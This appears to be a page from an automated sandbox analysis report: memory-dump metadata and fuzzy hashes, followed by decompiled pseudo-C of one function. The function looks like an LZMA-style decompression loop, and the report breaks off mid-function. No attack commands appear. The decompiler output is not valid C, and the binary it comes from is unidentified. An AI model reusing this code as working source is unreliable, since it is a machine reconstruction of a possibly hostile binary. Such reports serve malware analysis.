                                                                                    0x00000000
                                                                                    0x00406762
                                                                                    0x00406762
                                                                                    0x004064df
                                                                                    0x004064df
                                                                                    0x00000000
                                                                                    0x004064df
                                                                                    0x00406760
                                                                                    0x00406995
                                                                                    0x00406995
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4
                                                                                    0x004069cc
                                                                                    0x004069cc
                                                                                    0x00000000
                                                                                    0x004069cc
                                                                                    0x00406819
                                                                                    0x00406899
                                                                                    0x00406862

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                    • Instruction ID: 319d18918fa2cc3741333e20ed782d5c303dd2f769888eebbc994f2124d7c2e6
                                                                                    • Opcode Fuzzy Hash: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                    • Instruction Fuzzy Hash: 29A15171E00229CBDF28CFA8C8547ADBBB1FF44305F15812AD856BB281D7789A96DF44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E00406767() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
